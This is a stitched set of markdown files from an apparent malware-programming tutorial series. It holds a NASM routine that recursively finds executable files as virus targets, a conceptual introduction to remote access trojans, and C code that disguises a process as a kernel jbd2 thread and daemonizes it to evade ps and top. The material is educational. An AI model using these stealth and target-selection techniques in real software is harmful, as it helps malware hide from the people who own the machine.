256 | When we call ourselves recursively to traverse the subfolders we need to store in the stack the local variables we are holding on registers for efficiency. These are `r8` (the `getents` buffer we are processing), `r9` (the number of bytes in that buffer) and `r14` (the current offset in the buffer of the entry we are processing right now).
257 | 
258 | We could declare extra local variables in the stack as we did for the `FD`, but in this case we decided to just push and pop the values just before the `call`. This way, the code is shorter and we only perform that operation (saving to memory) only when it is necessary. Note that a `mov` is principle more efficient (faster) but it produces a bit longer code (4 bytes vs the 2 bytes required by the `push/pop`).
259 | 
260 | 
261 | # The final code
262 | 
263 | As usually, this is the final code of our `select_target` function:
264 | 
265 | ```nasm
266 | 	global mfw_select_target
267 | 	extern mfw_puts
268 | 	extern mfw_putln
269 | 	extern mfw_openat
270 | 	extern mfw_newfstatat
271 | 	extern mfw_getdents
272 | 	extern mfw_close
273 | 
274 | 	section .text
275 | 	
276 | mfw_select_target:
277 | 	BUF_SIZE  EQU     0x400
278 | 	STAT_SIZE EQU     0x144
279 |   	FD	  EQU     0x08
280 |  	BUF       EQU     (FD   + BUF_SIZE)
281 | 	ST        EQU     (BUF + STAT_SIZE)
282 | 	STE       EQU     BUF
283 | 	D_NAME    EQU     0x12
284 | 	D_RECLEN  EQU     0x10
285 | 	ST_MODE   EQU     0x18
286 | 	
287 | 	;; Create Stack Frame
288 | 	push  rbp
289 | 	mov   rbp, rsp
290 | 	sub   rsp, STE
291 | 	
292 | 	;; Open Directory
293 | 	;; RDI and RSI should be all set
294 | 	mov  rdx, 0q200000 	;O_RDONLY | O_DIRECTORY
295 | 	call mfw_openat
296 | 	test al,al
297 | 	js   done1		; Exit if we cannot open the folder. Likely permission denied error
298 | 	
299 | 	mov  QWORD [rbp-FD], rax ;Store fd in local var
300 | loop0:
301 | 	mov  rdi, QWORD [rbp-FD]
302 | 	lea  rsi, [rbp-BUF]
303 | 	mov  rdx, BUF_SIZE
304 | 	call mfw_getdents
305 | 	
306 | 	test ax,ax
307 | 	jz   done		; 0 means we are done reading the folder
308 | 	js   loop0 		; <0 means error.... we just try again
309 | 
310 | 	mov r9, rax		; Loop limit
311 | 	lea r8, [rbp-BUF] 	; Points to struct linux_dirent record
312 | 	xor r14,r14 		; Loop counter = 0
313 | 
314 | loop1:
315 | 	lea   rdi, [r8 + r14  + D_NAME] ; Offset to current dirent name
316 | 	
317 | 	;; Skip . and .. names
318 | 	;; ---------------------------
319 | 	cmp WORD [rdi], 0x002e
320 | 	je next
321 | 	cmp WORD [rdi], 0x2e2e
322 | 	jne check_file
323 | 	cmp BYTE [rdi+2], 0
324 | 	je next
325 | 	
326 | 	;; Check file type and permissions
327 | check_file:	
328 | 	lea    rsi, [rdi]	    ; Par2 : name
329 | 	mov    rdi, [RBP - FD]  ; Par1 : fd
330 | 	lea    rdx, [RBP - ST]  ; Par3 : struct stat
331 | 	xor    rcx, rcx		    ; Par4 : flags
332 | 	call   mfw_newfstatat
333 | 	
334 | 	test   al,al
335 | 	js     next		; Silently skip this file on error. Likely Permission denied
336 | 	
337 | 	;; Check if it is a directory
338 | 	mov  eax, DWORD [rdx + ST_MODE]
339 | 	and  eax, 0q0170000
340 | 	cmp  eax, 0q0040000
341 | 	jz   scan_folder	; If it is a directory... scan recursively
342 | 	cmp  eax, 0q0100000 
343 | 	jnz  next               ; If it is not a regular file.... skip it
344 | 	
345 | 	;; If we got a regular file then let's check permissions
346 | 	mov  eax, DWORD [rdx + ST_MODE]
347 | 	and  eax, 0q00111	; Execution permisions
348 | 	jz   next		    ; If no execution permision set... skip the file
349 | 	jmp  run_payload	; Otherwise run the payload on it
350 | 	
351 | scan_folder:
352 | 	;; Before the recursive call we need to store current state in the stack
353 | 	;; File descruptor and getents are already there. We just store the registers
354 | 	;; This way, we only use the memory when scanning a subfolder
355 | 	push  r8 		; Current getdents buffer
356 | 	push  r9		; Number of bytes in getents buffer
357 | 	push  r14       ; Current getendts buffer ofsset 
358 | 
359 | 	call  mfw_select_target ; RDI and RSI already set to the right parameters
360 | 	;; Restore evertything and keep going
361 | 	pop   r14		; PUSH/POP are 2 bytes long... mov reg, [bp-XX] is 4
362 | 	pop   r9
363 | 	pop   r8
364 | 	jmp   next		; Continue
365 | 	
366 | run_payload:
367 | 	;;  For the time being just print file name
368 | 	mov  rdi, rsi
369 | 	call mfw_putln
370 | 
371 | next:
372 | 	movzx rdx, WORD [r8 + r14 + D_RECLEN] ; Get Record len | Same size thqan mov
373 | 	add r14,rdx
374 | 	cmp r14, r9
375 | 	jge loop0                ; If it is zero, get more data
376 | 	jmp loop1
377 | 	
378 | done:	
379 | 	;; Close directory
380 | 	mov rdi, QWORD [rbp-FD]
381 | 	call mfw_close
382 | done1:	
383 | 	leave     		; Set RSP=RBP and pops RBP
384 | 	ret
385 | 
386 | ```
387 | 
388 | # Conclusions
389 | As I said this was very short, we already know a lot of assembler and system programming to code this part so this was just work we had to do. We took the chance to talk a little bit about number representation, and we got a recursive function working in assembly... which is not that hard once we learned what that involves in the previous instalments.
390 | 
391 | For the next instalment we should start looking into some payload.... I envision a first theoretical instalment to introduce the related concepts before jumping in to the code....
392 | 
393 | So, now it is time for you to decide:
394 | 
395 | [poll type=regular results=always chartType=bar]
396 | * VIRUS
397 | * RANSOMWARE
398 | * SPYWARE
399 | * RAT
400 | [/poll]
401 | 
402 | 
403 | ## Read the whole series here
404 | [Part IX. Finding Files in asm](https://0x00sec.org/t/programming-for-wanabes-ix-finding-files-in-asm/25794)
405 | [Part VIII, File Details](https://0x00sec.org/t/programming-for-wanabes-viii-file-details/25738)
406 | [Part VII. Finding files](https://0x00sec.org/t/programming-for-wanabes-vii-finding-files-i/25662)
407 | [Part VI. Malware Introduction](https://0x00sec.org/t/programming-for-wannabes-part-vi-malware-introduction/25595)
408 | [Part V. A dropper](https://0x00sec.org/t/programming-for-wannabes-part-v-a-dropper/23090)
409 | [Part IV. The stack](https://0x00sec.org/t/programming-for-wannabes-part-iv/22421)
410 | [Part III. Your first Shell Code](https://0x00sec.org/t/programming-for-wannabees-part-iii-your-first-shell-code/1279)
411 | [Part II and a Half. Part II for ARM and MIPS](https://0x00sec.org/t/programming-for-wannabes-part-ii-and-a-half/1196)
412 | [Part II. Shrinking your program](https://0x00sec.org/t/programming-for-wannabes-part-ii/1164)
413 | [Part I. Getting Started](https://0x00sec.org/t/programming-for-wannabes-part-i/1143)
414 | 


--------------------------------------------------------------------------------
/part-11.md:
--------------------------------------------------------------------------------
  1 | # Programming for Wanabes XI. Introduction to RATs
  2 | So my 0x00sec fellows've spoken and RATs will be. As anticipated in this first instalment we will mostly discuss theoretical concepts, which means not much code.... but will be some :). Let's start.
  3 | 
  4 | RAT stand for `Remote Access Trojan`, actually the last `T` could also be _Tool_ instead of _Trojan_ and then we will be talking about common tools used in corporate environments instead of malware. Conceptually both things do the same, i.e. allow a third party to remotely access and control a computer. Or if you prefer, they allow to break the privacy of people. The difference is that in some case there is some official and even legal support to install and run the tool and in the other... no. In any case, and most of the time, the users do not have a clue of what is going on :).
  5 | 
  6 | # RAT's functionality
  7 | The ultimate goal of a RAT is provide root shell access to the machine (or Administrator access if you prefer). Right, a _Backdoor_ is, somehow, the simplest form of a RAT. It is true that many RATs provide specific functions like capturing video or audio, steal credentials, etc... however all these actions are pretty straight forward whenever you have privileged access to the machine. Or in other words, when you are able to upload and run any SW you want.
  8 | 
  9 | So, I will keep aside specific task to perform in the victim as the one mentioned above for the time being, and get focused on the actual core of the RAT: enabling remote access. For doing this, we need the following:
 10 | 
 11 | * Remote Shell Access (execute specific commands is a kind of subset of this)
 12 | * Secure communication with a third party. That third-party will usually be a C2C application controlled by the attacker. This implies general data interchange (commands and responses but also file transfers in both directions)
 13 | 
 14 | We will look into this again in the context of this course, but I have already written about this in [here](https://0x00sec.org/t/remote-shells-part-i/269), [here](https://0x00sec.org/t/remote-shells-part-ii-crypt-your-link/306), [here](https://0x00sec.org/t/remote-shells-part-iii-shell-access-your-phone/508) and [here](https://0x00sec.org/t/remote-shells-part-iv-the-invisible-remote-shell/743)... 
 15 | 
 16 | On top of that, and I said on top, because what come next are orthogonal functions in the sense that they are used by many other types of malware and not specifically for RATs:
 17 | 
 18 | * Privilege Escalation. 
 19 | * Hiding
 20 | * Network Pivoting (Optional)
 21 | * Persistence (Optional)
 22 | 
 23 | ## Privilege Escalation
 24 | This is a two-manifold topic. In one hand, it is common to have enumeration utilities available in the RAT infrastructure (either as part of the RAT or as a module that can be downloaded in the victim) to help the attacker get an administrator account. 
 25 | 
 26 | Imagine that the RAT got executed using some Social Engineering technique. In such a case, it will likely be executed as an unprivileged user, and the attacker will try to escalate that situation in order to have full access to the machine. 
 27 | 
 28 | On the other hand, the enumeration tools just provides the information about potential vulnerabilities in the machine. Then appropriated exploits are required in order to make those vulnerabilities into advantages to escalate user privileges.
 29 | 
 30 | Note that, some times the RAT gets executed already using a vulnerability (either local or remote) that gives it superuser privileges from time zero. In those cases the enumeration functions are just taking space and are not useful... Well, not exactly... What does this mean is that this kind of malware many times have a module/plug-in subsystem to enable the activation (and alternative download from the C2C) of functions when needed. Such a system in a malware context may be a bit complex, as sometimes you cannot just use standard functions provided by the system.
 31 | 
 32 | ## Hiding
 33 | Other function that most RAT implement is some kind of hiding capabilities. There are a few options on how to do this, depending on how secure is the target system.
 34 | 
 35 | * __Hide on-sight__. On low-security systems sometimes it is just enough to give the RAT a cryptic-system-like name to make it invisible. Imagine the machine of a regular user that has just being compromised, for instance, to be used in a proxy chain or to become a zombie in a Botnet. You can just call your RAT something like `[kworker/u12:7]` and not even an advanced user may pay attention to it.
 36 | * __Install a rootkit__. Supposing the attacker has got root access to the machine s/he would easily install a rootkit to hide all tracks related to the RAT. Note that on a decently hardened machine kernel module loading would likely be disabled and run-time kernel patching may not be possible so maybe a user-space rootkit may be the only alternative.
 37 | * __Insert the RAT in a running process__. In this case, the RAT get itself copied in a running process and executed inside it, usually as a thread. This is a pretty stealth technique. For instance, imagine a Firefox that is already running, you will see firefox connections to many different server (supposing you have a hundred tab open as everybody does), together with the connection to the C2C machine. The basis of this is briefly described [here](https://0x00sec.org/t/running-binaries-without-leaving-tracks/2166). This technique also requires superuser permissions and makes persistence a bit tricky.
 38 | 
 39 | ## Network Pivoting
 40 | This is an optional feature. It is common for RATs targeting cooperative environments where it is relatively easy (using social engineer for instance) to get into a machine with limited privileged from outside the network, and then reach internal machines, not accessible from the Internet, just jumping from different servers within the network. Sometimes the RAT offers a kind of proxy/router capability to connect the C2C to those internal machines.
 41 | 
 42 | Network pivoting can actually be seeing as a special case of privilege escalation, where the privileges are rising by accessing machines that may have access to services that other machines may not.
 43 | 
 44 | I bet all of you know what I'm talking about, but just in case. Imagine a web application. The front-end (all those pages and Javascripts) is accessible from the internet, but the back-end, the machine with the database and all the business logic is not, it only can be accessed from inside the target network.
 45 | 
 46 | As I said, network pivoting is a kind of systematic approach consisting on enumerating nearby computers accessible from the current compromised machine, determining any vulnerability or weak configuration, and then accessing it copying the RAT over and executing it there and effectively starting the process again from that machine.
 47 | 
 48 | Imagine for instance a machine in a corporate network. It has internet access, but the user also has access to some laboratory machines from that computer using SSH. Imagine that the user has configured ssh passwordless, what is pretty common specially when you need to access many machines remotely... Then we will have direct access to that machine for free...
 49 | 
 50 | ## Persistence
 51 | 
 52 | Finally, this functionality is also optional and depends on the nature of the attack. As mentioned before in this course, persistence is the capability of a malware to keep executing despite of being stopped for whatever reason (usually a reboot).
 53 | 
 54 | In general, a RAT will like to have some persistence mechanism, so the access to the machine is not lost after a reboot, or whenever the process dies for whatever reason. Persistence, usually implies writing something somewhere in the disk... because the disk is the memory on the computer that will survive reboots (if by a chance the target have other persistent storage, that would also be an option, think about flash memory in embedded platforms).... And not just that, further disk modifications are required in order to execute again that SW saved in that persistent memory.
 55 | 
 56 | Very advanced RAT targeting network environments, just act like a virus/worms. They have the capability to infect other machines so, after an initial attack enough machines in the network will be infected to ensure that after rebooting any of them, there will be some instance of the malware running in the network that will infect again that machine. This is a very smart and powerful technique as the attacker is not storing anything on the disk at the same time that it achieves persistence... Anyhow, as you can see, this will not work on all cases and it targets a very specific environment.
 57 | 
 58 | # Let's write a RAT: r4t0x0
 59 | 
 60 | Our first RAT is going to be damn simple, but it is going to be a complete/real RAT. Let's go for the following:
 61 | 
 62 | * Hide on-sight
 63 | * Basic Persistence
 64 | * Remote shell
 65 | 
 66 | If we recall our original malware skeleton, the two first features have to be implemented in the `init` function. 
 67 | 
 68 | _Note: In this instalment we will just drop the code on `main` as it will be just a few lines._
 69 | 
 70 | For persistence we will be going low profile, just store the file on the home folder of the user looking like a configuration file and silently patch `bash_profile` to launch it on each user session. A more sophisticated RAT could, for instance, determine the actual shell being used and patch the appropriate start-up files or look for a folder in the home directory containing many files so the RAT will be more stealth. 
 71 | 
 72 | As I said we are going to keep it simple. The point of this exercise is that you understand how this works so, you will be able to extend the program to test any other technique you want to learn about or experiment with. Once you understand the basics you will be in the position to analyse different protection systems and start to try to figure out how to overcome... and then how to modify the protection system to detect you RAT, and then break it again,... and so forth. Lots of fun ahead.
 73 | 
 74 | Finally, the `remote shell` will be our main `payload`. In this case, as we mentioned in the [malware introduction](https://0x00sec.org/t/programming-for-wannabes-part-vi-malware-introduction/), RATs runs on an interactive loop, so there is no target selection function to feed the payload.
 75 | 
 76 | We will be going through the different features of the RAT one by one from scratch, so you will see a _possible_ process on how to determine what is the issue you want to solve and how to solve it step by step until you reach your goal. As it happens with many other problems in real life, the key point is to get to know what is the problem you want to solve... this seems pretty trivial, but many times people lost the point and end up overcomplicating things that doesn't really add to the solution of the problem. Anyhow, I hope the approach we are going to follow will help you not only to write malware or tools to detect malware, but to solve problems in general... That is the important thing to learn.
 77 | 
 78 | Let's get started with the first point.
 79 | 
 80 | # Hiding on-sight
 81 | Our goal here is to keep the RAT low profile and avoid it to be detected. As we discussed in the introduction sometimes just changing your name and being quiet will be more than enough to go unnoticed. 
 82 | 
 83 | The easiest way is to give the process the name of some system thread. Not even an advanced user will be able to spot the RAT on `ps` or `top` at first (or any other tools actually). However... your program has to be properly coded and be efficient otherwise... seen something that looks like a system thread taking 100% of the CPU, and popping on top of `top` all the time.... well, that will be suspicious. And then it is just a matter of time to get discovered.
 84 | 
 85 | Let's see how all this works. We will be using `ps`, but most monitoring tools work the same, actually reading data from `/proc/PID`. 
 86 | 
 87 | You can now run a `ps -ax` on your system an take a look to what you get. You can also install different distros on VMs and check differences between distros and kernels to chose a name that fits well in more platforms. These are some examples I get from an Ubuntu machine:
 88 | 
 89 |        10 ?        S      0:00 [migration/0]
 90 |        13 ?        S      0:00 [cpuhp/1]
 91 |        14 ?        S      0:03 [watchdog/1]
 92 |        22 ?        S      0:04 [ksoftirqd/2]
 93 |        24 ?        I<     0:00 [kworker/2:0H]
 94 |        46 ?        S      0:01 [ksoftirqd/6]
 95 |        48 ?        I<     0:00 [kworker/6:0H]
 96 |       358 ?        S      0:27 [jbd2/sda5-8]
 97 |       991 ?        S      1:01 [jbd2/sda6-8]
 98 |      2189 ?        S      0:00 [nfsd]
 99 |      2190 ?        S      0:00 [nfsd]
100 |      2191 ?        S      0:00 [nfsd]
101 | 
102 | There are many more options, just take a look on your own system. 
103 | 
104 | User space programs are more susceptible to be noticed by the user/administrator, but, for instance in the example above, you can see a few threads of the kernel NFS server running... They all look the same, so it is likely that nobody will notice an extra line like those (except for the sequential PIDs)... However not everybody runs an NFS server... the `kworker` option sounds better but process status is `I`. That means it is a kernel `Idle` task that I believe is an state we cannot reach from user space... But I haven't researched this. Let me know in the comments if you can get that.
105 | 
106 | The `jdb2` is the _Journaling Block Device_ basically will be there whenever you use a file system with journaling capabilities like `ext3` or `ext4` common on GNU/Linux boxes. This appears with an `S` status that means, _Sleeping_ and that is what our RAT will do most of the time, so, let's go for this one.
107 | 
108 | We will change the process name, but we will also try to mimic the other columns values. A normal user will not notice those but a system administrator will and may find them suspicious, so we better are methodical. When we are done with this you will find a funny coincidence...
109 | 
110 | ## Changing a process name
111 | Let's first take a look to how does a normal process looks like. Let's compile this simple program that just go into sleep mode waiting for some user input (that is what `getchar` does... gets a char):
112 | 
113 | ```C
114 | #include <stdio.h>
115 | #include <string.h>
116 | 
117 | int main (int argc, char *argv[]) {
118 |   printf ("This is RAT0X0 version 0.1\n");
119 |   getchar ();
120 | }
121 | ```
122 | 
123 | Now, let's compile and run it and on a different terminal let's see how `ps` sees this simple process:
124 | 
125 |     $ ps -ax | grep rat
126 |     (...)
127 |     23022 pts/24   S+     0:00 ./rat0x0-01
128 | 
129 | That doesn't look promising. We could already change the name to `jbd2SOMETHING` on the disk before running the program but that will be suspicious and unlikely to be executed by a user.... We should assume that the program will have an arbitrary name.
130 | 
131 | The simplest way to change the name is to overwrite the `argv[0]` parameter that is actually the file name of the program being executed:
132 | 
133 | ```C
134 | #include <stdio.h>
135 | #include <string.h>
136 | 
137 | int main (int argc, char *argv[]) {
138 |   printf ("This is RAT0X0 version 0.1\n");
139 |   strcpy (argv[0],"[Jbd2/sda0-8]");
140 |   getchar ();
141 | }
142 | 
143 | ```
144 | 
145 | > Note: In principle your target name shall have the same length or less than the original one so it will fit in the current assigned memory. Otherwise you will need to shuffle around the stack to make room for the extra characters...
146 | 
147 | Let's try:
148 | 
149 |     $ ps -ax | grep rat
150 |     (...)
151 |     23431 pts/39   S+     0:00 grep rat
152 | 
153 | No trace of `rat0x0`. Let's see how this new `jbd2` looks like:
154 | 
155 |     $ ps -ax | grep bd2
156 |        358 ?        S      0:27 [jbd2/sda5-8]
157 |        991 ?        S      1:01 [jbd2/sda6-8]
158 |      23371 pts/24   S+     0:00 [Jbd2/sda0-8]
159 | 
160 | I have just add a capital `J` to easily identify the process during development (you will have to kill it a few times). Note that `sda0` is not a valid partition name so it should be safe... alternatively you could also swap the `b` and the `d` in the name and use a valid partition name... Well, you can try different options to chose a name that will be unnoticeable, at least at first glance... 
161 | 
162 | However note than, when people suspect that there is something doggy going on, they will start looking on the details and sooner than later this will be uncover... As I said this is the most simplistic way to hide your RAT. And it works as far as nothing suspicious happens.
163 | 
164 | Anyhow, our process still shows a PTY (that means it is associated to a terminal) and also there is a `+` after the `S` that indicated that it is in the foreground.
165 | 
166 | # Going background
167 | What comes next is basically the process you follow to code a classical daemon. Yes, no hacker/malware developer black magic... just good old system programming. When writing a daemon you need to disconnect the process of any terminal, session and process group so the process doesn't get terminated unexpectedly. You do a couple things more, but that is the very minimum to become a `daemon Let's go step by step. 
168 | 
169 | First, let's go background.
170 | 
171 | The way to achieve this is to `fork` and kill our parent. All this process management things always sounds funny when explained with words :). When we `fork`, we create a new process that is an exact copy of the original one. The only difference between the father and the child is that, after `fork` the PID of the child is returned to the father and 0 is returned to the child. Both process continuing execution in the line just after `fork` in the program. Usually the father process creates a child to do something and get some result, so it will have to eventually wait for the process to finish and for that it needs the PID (well, it is better to know it). The child doesn't need that, and can get its PID at any time just calling `getpid()`. No it won't know its parent.  Our powerful `rat0x0` will look like this now
172 | 
173 | ```C
174 | #include <stdio.h>
175 | #include <unistd.h>
176 | #include <string.h>
177 | 
178 | int main (int argc, char *argv[]) {
179 |   printf ("This is RAT0X0 version 0.1\n");
180 |   strcpy (argv[0],"[Jbd2/sda0-8]");
181 |   pid_t pid = fork();
182 |   if (pid!=0) return 0;
183 | 
184 |   while (1) usleep (1000);
185 | }
186 | ```
187 | 
188 | As you can see we just create a new copy of ourselves using `fork` and then we kill the parent (the one that received a PID different of 0). I have also removed the `getchar` because we are trying to get our process disconnected from the terminal and that is a function that uses `stdin`.
189 | 
190 | If we run this process, `ps` will show now this:
191 | 
192 |     $ ps -ax | grep bd2
193 |       358 ?        S      0:27 [jbd2/sda5-8]
194 |       991 ?        S      1:01 [jbd2/sda6-8]
195 |     26956 pts/24   S      0:00 [Jbd2/sda0-8]
196 | 
197 | Great... We have got rid of the `+`... But we still have an associated terminal to our process.
198 | 
199 | # Getting rid of the terminal
200 | The way to release the terminal associated to the process is to actually leave the current session. I'm not going to go into the details about session and process groups here. In simple words, you start a session when you log-in. Any process you create after that belongs to the session. This allows the system to know which process to kill when the session is closed by the user. Did you ever wonder how the OS magically know what to kill if you just leave your session?
201 | 
202 | Daemons, and also our cute RAT do not want to get killed when the user closes the session from which they were started... well, daemons are usually started by the system at start up, but just in case you start one of them manually in a terminal. The way to do this is to create a new session for our process. And we do this with the `setsid` system call:
203 | 
204 | ```C
205 | #include <stdio.h>
206 | #include <unistd.h>
207 | #include <string.h>
208 | 
209 | int main (int argc, char *argv[]) {
210 |   printf ("This is RAT0X0 version 0.1\n");
211 |   strcpy (argv[0],"[Jbd2/sda0-8]");
212 |   pid_t pid = fork();
213 |   if (pid!=0) return 0;
214 |   setsid ();
215 |   while (1) usleep (1000);
216 | }
217 | ```
218 | 
219 | Now we can compile and check again:
220 | 
221 |     $ ps -ax | grep bd2
222 |       358 ?        S      0:27 [jbd2/sda5-8]
223 |       991 ?        S      1:01 [jbd2/sda6-8]
224 |     27496 ?        Ss     0:00 [Jbd2/sda0-8]
225 | 
226 | 
227 | Damn, what is that `s` that just popped up?
228 | 
229 | # Stop being a Process Leader
230 | If you read the man page for `setsid` it says:
231 | 
232 | > setsid()  creates  a new session if the calling process is not a process group leader.  The calling process is the leader of the new session (i.e., its session ID is made the same as its process ID).  The calling process also becomes the process group leader  of  a new process group in the session (i.e., its process group ID is made the same as its process ID).
233 | 
234 | Also you can check the man page for `ps` to veryfy what does the `s` means in its output.
235 | 
236 | Done?... There you go... That is what and where the `s` is/comes from. So, to stop being a session leader for this session, we have to... `fork` again.
237 | 
238 | ```C
239 | #include <stdio.h>
240 | #include <unistd.h>
241 | #include <string.h>
242 | 
243 | int main (int argc, char *argv[]) {
244 |   pid_t pid;
245 |   printf ("This is RAT0X0 version 0.1\n");
246 |   strcpy (argv[0],"[Jbd2/sda0-8]");
247 |   if ((pid = fork()) != 0) return 0;
248 |   setsid(); // Remove TTY
249 |   if ((pid = fork()) != 0) return 0;
250 | 
251 |   while (1) usleep (1000);
252 | }
253 | 
254 | ```
255 | 
256 |     $ ps -ax | grep bd2
257 |       358 ?        S      0:27 [jbd2/sda5-8]
258 |       991 ?        S      1:01 [jbd2/sda6-8]
259 |     27742 ?        S      0:00 [Jbd2/sda0-8]
260 | 
261 | And there you go.... Same fingerprint than the kernel processes.... Well, the PID is way higher... Nobody is perfect.
262 | 
263 | > PIDs are reused when the maximal PID number is reached. This value is defined at `/proc/sys/kernel/pid_max` and usually is 32768... So you can start forking and exiting process until you get a pid below 1000/2000... Haven't tried this but it should work... Just do not fork to fast or you will look like a fork bomb
264 | 
265 | The code above is pretty simple and you should be able to code the assembler version by yourself. Just add the two new system calls in the `mfw.asm` file and do a couple comparisons and conditional jumps. If you do not want to do it yourself and you have any issue, be free to ask and , in any case, I will add the code in a later instalment anyway.
266 | 
267 | # Conclusion
268 | In this instalment we have gone quickly through the main features of a RAT and after that we have defined a simple one to use as example in the comming instalments. It has very few features so we can keep it simple while we learn more about our system. So far we have learn how to manipulate the way the process is shown for system tools like `ps` and `top`... and at the same time, accidentaly :), we have learn how to convert any program in a `daemon`. So far, `rat0x0` just looks like a regular system daemon... nothing really special about it. That is the key of a good RAT... just look normal.
269 | 
270 | 
271 | 


--------------------------------------------------------------------------------
/part-02.md:
--------------------------------------------------------------------------------
  1 | # Programming for Wannabes. Part II
  2 | 
  3 | Glad to see you have come back to this humble course. Hope you are eager to get a lot more stuff to digest. Grab some coffee and relax.
  4 | 
  5 | I have been claiming that this course is going to be different to all those that you find over the Internet. Right now, I should introduce a whole bunch of boring things (numeric representation, addressing modes, instructions groups,...) and guess what?... I won't do that.
  6 | 
  7 | In order to avoid going through all that boring stuff and to try to follow a learn-by-example approach, we need to be able to build programs. In the previous part we've got a glimpse on that, but we cannot yet produce a executable out of some assembly code.
  8 | 
  9 | Furthermore, in the previous part we started looking to the HW to help us introduce some concepts. In this part, we are going to look a bit to the upper layers and how they lay one over the other.
 10 | 
 11 | Finally, you need to know that we are going to use `nasm` in this course. This is a very well-know and powerful assembler that will help us to produce machine code out of our assembly code. So, before you keep reading, go and install it!
 12 | 
 13 | # Our First Assembly Program
 14 | So, let's start with the simplest, Linux OS-compliant program we can write. There you go:
 15 | 
 16 | ```nasm
 17 | 	global _start
 18 | _start:	mov rdi, 10
 19 | 	mov rbx, 20
 20 | 
 21 | 	add rdi,rbx
 22 | 
 23 | 	mov rax, 0x3c
 24 | 	syscall
 25 | ```
 26 | 
 27 | Well, the central part of the program should look familiar to you by now. We are using different registers in this case, but we are again adding two numbers. There are two main  differences with respect to our previous example:
 28 | 
 29 | - First, we are defining a symbol that will be `global` and will mark up the first instruction of our program. That is the `_start`. Try to remove the `global` declaration and you will get an error when you try to compile it saying that the `_start` symbol cannot be found.
 30 | - We have two new instructions at the very end. We will explain these in detail in a sec, but first let's compile and run the program to check that we are good to go.
 31 | 
 32 | Let's compile our program:
 33 | 
 34 |     $ nasm -f elf64 -o c2-1.o c2-1.asm
 35 |     $ ld -o c2-0s c2-1.o
 36 |     $ ./c2-0s; echo $?
 37 |     30
 38 | 
 39 | Very good. We have built an executable out of our assembly source code and when we run it, the program returns the result of our operation. I believe this is the simplest ASM program you can actually write that does something. Yep, the bash variable `$?` contains the return value of the last executed command. Try to change the numbers in the ASM file, recompile and check that the `$?` will contain the sum.
 40 | 
 41 | So.... we have something to start to work with.... and a lot of things to explain.
 42 | 
 43 | # Producing and Executable
 44 | Let's start from the last step. The generation of the binary. To produce a program out of an ASM source code, we will have to convert it into machine code and then convert it into a program that can be executed by a given OS. Some times we do this in just one step, but it is actually two separated stages.
 45 | 
 46 | As you should know by now, we are working with Linux. The default executable format is ELF. We are writing 64bits ASM, so we will tell our assembler that we need some object code (that's the name for those .o files you obtain from your assembler or compiler) in a specific format. In this case `elf64`. We use the command-line flag `-f` to specify that. The `-o` stands for _output_ and let us indicate the file were we want the result stored. Then we just append the list of source files to assemble.
 47 | 
 48 | Using the right format for our object code, is important, because that will allow us to use all other standard tools in the system. One of those tools is the linker.
 49 | 
 50 | Let's look to the standard process of producing an executable:
 51 | 
 52 | - The **source code** (in any language) is converted to **object code**. This is done by the compiler. An assembler can be seen as a compiler for assembly code.
 53 | - The **object code** is not directly executable. it needs to be converted into an application, and this task is done by the linker. In our case we have one single object file but, in general, an application is composed of multiple object files (coming from different source code files), static libraries, dynamic libraries, etc... The linker is the program that _links_ all those pieces together, and it does this in a way that the OS can make sense out of it.
 54 | 
 55 | In this simple case we are invoking the linker (`ld`) and we are instructing it to produce a executable named `c2-0s` (the `-o` flag again) out of a single object file. In general, the compiler is able to invoke the linker under the hood, and that is why you can produce a binary out of your source code invoking `gcc`... but be aware that, to do that, `gcc` is actually calling other programs, including the linker `ld`.
 56 | 
 57 | We will be using the assembler and the linker continuously. Do not worry if you haven't fully grasp the idea. You'll do as we go. For now, if you haven't fully understand this, just keep in mind that you have to use `nasm` to compile your ASM code, and `ld`, to produce an executable out of it.
 58 | 
 59 | # System Calls
 60 | At the beginning I said that we will be dealing with the other layers in our simplified SW model (OS, standard library,..). We have just seen that we need to produce our executable in a format that the OS can understand. But we have to interact with the OS.
 61 | 
 62 | For our simple example, our interaction with the OS consists on returning a value that we've calculate inside our program whenever our program executing ends and returns control to the calling process (usually `bash` the command-line interpreter). If we keep the value in a register inside our program there is no way to let anybody else know about it. 
 63 | 
 64 | So, in order to interact with the OS we have to use a system call (**syscall**). The operating system offers some services to the applications running on it. This services are accessible using these system calls. Opening files, mapping memory, reading directory contents,... all these actions requires interaction with the hardware (the hard drive, the memory management unit, the file system driver -ok, this one is not HW :)-,...) and are managed by the OS. 
 65 | 
 66 | In the last two lines of our program we are actually using one of those services. The system call we are using is `SYS_EXIT`, that finishes the process returning a value to the calling process.
 67 | 
 68 | System calls are identified by a number, and the number for the `exit` syscall is `0x3c`. As you can see, in order to access a system call in a x86/64bits processor, we have to do 3 things (actually you can only see, explicitly, two of them in our example).
 69 | 
 70 | 1. Load the system call number in the `rax` register. 
 71 | 2. Load other required parameters in other registers. This we are not doing directly
 72 | 3. Use the `syscall` instruction to jump into kernel mode.
 73 | 
 74 | Yes, system calls are executed by the kernel (the OS), so what we basically do, is to put some values in some registers and then give control to the OS. The way to do that is platform-dependent. The `syscall` we used above is the standard way to invoke a system call on a x86 64bits. For 32 bits you usually invoke the software interruption 0x80 (`int 0x80`).
 75 | 
 76 | Let's reproduce the last lines of our program here again:
 77 | 
 78 | ```nasm
 79 | 	add rdi,rbx
 80 | 	mov rax, 0x3c
 81 | 	syscall
 82 | ```
 83 | 
 84 | We can clearly identify how we set `rax` with the value `0x3c` (the `exit` system call). We can also clearly identify how we give control to the kernel using the mnemonic `syscall`. But what is not clear is how do we pass the result of our operation to the `exit` call so the `$?` bash variable gets actually modified.
 85 | 
 86 | Well, for the `exit` system call, the `rdi` register have to be set with the value we want our program to return. That is why we have done the addition directly on the `rdi` register, so we do not have to explicitly set it before calling our system calls. Reordering the source code:
 87 | 
 88 | ```nasm
 89 | mov rax, 0x3c
 90 | add rdi, rbx          ====>  exit (a+b)
 91 | syscall           
 92 | ```
 93 | 
 94 | In this link you can find a list of system calls and the registers that you should use to pass parameters to them.
 95 | 
 96 | http://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/
 97 | 
 98 | # Getting our Function to Work
 99 | Now, we completely understand our assembly code, and we also know how to produce an executable out of it. The last piece in the puzzle is how the compiler+linker know that they have to run the code marked with the `_start` label.
100 | 
101 | In order to understand this, we are going to move into C and try to reproduce our assembly program. The same program in C would look like this:
102 | 
103 | ```C
104 | #include <unistd.h>
105 | 
106 | int main (void)
107 | {
108 |   int a = 10;
109 |   int b = 20;
110 |   
111 |   a = a + b;
112 |   _exit (a);
113 | }
114 | ```
115 | 
